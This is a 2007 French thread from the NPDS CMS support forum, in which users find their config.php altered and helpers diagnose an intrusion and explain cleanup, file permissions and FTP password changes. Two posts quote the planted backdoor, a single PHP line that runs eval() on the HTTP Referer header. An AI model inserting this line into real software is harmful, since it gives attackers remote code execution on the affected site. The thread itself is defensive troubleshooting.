logo

NPDS : Gestion de contenu et de communauté

Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
35 visiteur(s) et 0 membre(s) en ligne.
Activité du Site

Pages vues depuis 25/05/2001 : 108 405 174

• Nb. de membres 8 693
  • Nb. d'articles 1 695
  • Nb. de forums 26
  • Nb. de sujets 8
  • Nb. de critiques 92

Top 10  Statistiques

Index du forum »»  Sécurité »» gros plantage dans config.php

Nouveau sujet
 gros plantage dans config.php#22099Répondre

8Contributeur(s)
lebuzzTitoUTR70oimGiamDocdeveloppeurmisfumatanel
3 Modérateur(s)
developpeurjpbJireck
lebuzz lebuzzicon_post
message d'erreur suivant lorsque les utilisateurs se connectent à mes sites (tous mes sites sous NPDS Sable dernière version...) :

Parse error: syntax error, unexpected ':' in /mnt/141/sda/4/c/olivier.delannoy/npds/config.php(125) : eval()'d code on line 1

Warning: Cannot modify header information - headers already sent by (output started at /mnt/141/sda/4/c/olivier.delannoy/npds/config.php(125) : eval()'d code:1) in /mnt/141/sda/4/c/olivier.delannoy/npds/index.php on line 40

je n'ai touché à rien !!! :D qq a t-il une solution ???
Tito Titoicon_post
Ca ne fait ça que quand quelqu'un s'identifie?

Tu peux nous copier les lignes 120 à 130 de ton config.php? (normalement il n'y a aucune donnée sensible aux alentours de la ligne 125).
lebuzz lebuzzicon_post
Voici les lignes en question :

# $storyhome: How many stories to display in Home Page?
# $oldnum: How many stories in Old Articles Box?
# $ultramode: Activate ultramode plain text and XML files backend syndication? (1=Yes 0=No). locate in /cache directory
######################################################################

$top = 10;if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);
$storyhome = 10;
$oldnum = 10;
$ultramode = 1;

######################################################################
# Banners/Advertising Configuration

A noter que l'entete de config.php semble avoir été piraté au niveau des codes d'acces qui ne sont pas les bons...
pour compléter le message d'erreur s'affiche au lancement de la page d'accueil et ce sur TOUS mes sites NPDS !!??

Message édité par : lebuzz / 21-03-2007 17:13

Tito Titoicon_post
Tu t'es fait piraté! :#

Supprime de toute urgence ça:
if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);
Tito Titoicon_post
J'ai posté le message précédent pour faire une réponse rapide

Ce code permet à une personne mal intentionnée d'exécuter n'importe quel script sur ton site!

Pour nettoyer ce fichier, va dans administration>préférences et valide (même sans modification). Cela réécrira un fichier propre.

Vérifie tout de même que le code avec HTTP_REFERER n'a pas été inscrit automatiquement dans config.php. Dans ce cas, il faut que tu réenvoyes le fichier /admin/settings_save.php.

Tu devrais modifier ton mot de passe FTP, car si ce bug apparait sur tous tes sites c'est probablement par là qu'on t'a piraté.
UTR70 UTR70icon_post
$top = 10;if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER]);

J'ai aussi cette ligne sur le fichier config.php

Que dois-je faire ?
Tito Titoicon_post
Beh je l'ai expliqué...
oim oimicon_post
Se serait bien de savoir ce que vous avez bien pu faire pour vous faire hacker !
UTR70 UTR70icon_post
J'avais remis une sauvegarde propre de config.php, donc je pense que créé un fichier propre ne l'empêchera pas de revenir.

Je vais tenter de modifier mon mot de passe FTP
GiamDoc GiamDocicon_post
vérifier déjà que vos chmods soient pas trop élevés style 777 ;-)

forum phpbb, module de Dodi comme zone upload par exemple

Message édité par : GiamDoc / 21-03-2007 21:40

UTR70 UTR70icon_post
Le Livre d'Or de Dodi aussi ?
GiamDoc GiamDocicon_post
C'est pas pour critiquer mais les modules de dodi sont pas sécur

faut prendre que les modules validés par modules.npds.org

il y a td-livredor sécurisé et (antispam) par xgonin

Message édité par : GiamDoc / 21-03-2007 22:00

GiamDoc GiamDocicon_post
Citation : UTR70 

Le Livre d'Or de Dodi aussi ? 

Il y a des logs avec ce module?
UTR70 UTR70icon_post
J'avais commencé le livre d'or avant de connaître TD-livredor, je n'ai pas pu migrer sinon je perdais tous mes messages.

Pour les logs, je ne sais pas ce que c'est, donc :-?
developpeur developpeuricon_post
A suivre donc
lebuzz lebuzzicon_post
ok, en fait mes deux sites http://www.lebuzz.org et http://www.tchecmeet.net ont été piraté pour la deuxieme fois... j'ai changé les codes mais je rame un peu... j'essaie de prendre en compte les remarques évoqués plus haut pour corriger !! j'avais aussi installé les anti-spam de npds mais les attaques étaient sévères... j'ai du bloquer les forum et les commentaires !! dur dur !! :D
Tito Titoicon_post
Chmod ton config.php en 644. Si ça se retrouve encore modifié, c'est que quelqu'un a accès par FTP.

Message édité par : Tito / 23-03-2007 15:06

GiamDoc GiamDocicon_post
Citation : lebuzz 

ok, en fait mes deux sites http://www.lebuzz.org et http://www.tchecmeet.net ont été piraté pour la deuxieme fois... j'ai changé les codes mais je rame un peu... j'essaie de prendre en compte les remarques évoqués plus haut pour corriger !! j'avais aussi installé les anti-spam de npds mais les attaques étaient sévères... j'ai du bloquer les forum et les commentaires !! dur dur !! :D  

déjà le buzz il est en
Version Num : 06.05
Version Id : NPDS
Version Sub : SABLE

y a un gros blem niveau MàJ
patch non appliqués
les forums sont en Code d'erreur : 0004
misfu misfuicon_post
Je suis pas très fort en php, mais essaye de chercher si tu trouves dans tes fichiers config.php ou index.php etc.. un "eval" l'injection de code PHP n'est possible que lorsque tu utilises des fonctions comme ca.
cf : http://www.php.net/eval

Tito Titoicon_post
NPDS utilise légitimement la fonction eval (dans l'antispambot par exemple)

De plus, ce n'est pas le seul moyen de créer une faille :b